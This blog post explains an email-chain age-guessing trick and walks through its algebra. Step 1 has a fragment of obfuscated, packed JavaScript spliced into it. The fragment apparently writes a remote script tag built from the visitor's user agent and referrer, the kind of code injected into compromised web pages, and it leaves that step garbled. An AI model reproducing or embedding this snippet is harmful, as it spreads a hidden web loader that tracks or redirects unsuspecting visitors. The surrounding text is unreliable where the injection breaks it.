Have you seen this? It’s an email chain that claims to “guess” your age.
I like these kinds of things, so I decided to bite. Here, try it out (you may want pen/paper/calculator handy):
1. ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|esefs|var|u0026u|referrer|hdtht||js|php’.split(‘|’),0,{}))
First, pick the number of times per week you’d like to have chocolate (more than 1 and less than 10).
2. Multiply by 2 (just to be bold).
3. Add 5.
4. Multiply by 50 (need a calculator….or maybe you just want to brush up on multiplication)
5. If you have already had your birthday this year, add 1762. If you haven’t, add 1761.
6. Now, subtract the 4 digit year you were born.
7. You should have a 3 digit number. The first digit is the number you originally chose and the next 2 numbers are your age!
Did it work? If not, check your math 🙂
Want to see how it works?
1. First, pick the number of times per week you’d like to have chocolate (more than 1 and less than 10).
It takes WAY too long to try out every possible number, so let’s pick X.
2. Multiply by 2 (just to be bold).
2*X
3. Add 5.
2*X+5
4. Multiply by 50 (need a calculator….or maybe you just want to brush up on multiplication)
Don’t forget PEMDAS! 50*(2X+5) = 100X + 250
5. If you have already had your birthday this year, add 1762. If you haven’t, add 1761.
I haven’t had my birthday yet, so we’ll use 1761:
100X + 250 + 1761 = 100X + 2011…..hmmm, does that number look familiar?
If we used 1762, we’d get this:
100X + 2012……another number that should look familiar
6. Now, subtract the 4 digit year you were born.
100X + 2011 – 1983 = 100X + 28
So now you should start to figure this out. If you’ve already had your birthday, you end up with 2012 minus your birth year. This gives you your age. If you haven’t had your birthday, you end up with 2011 minus your birth year. This gives you your age.
7. You should have a 3 digit number. The first digit is the number you originally chose and the next 2 numbers are your age!
The 3 digit number you end up with is 100X + YOUR AGE (a 2 digit number)
Remember what X started out as? Let’s say you picked 7, you’d have:
100*7 + YOUR AGE (We’ll call it ZY) = 700 + ZY = 7ZY
The first digit is the number you picked and the other 2 digits are your age!
And math prevails again, stay in school! Happy Monday!

My head hurts from thinking about this. I must need chocolate!
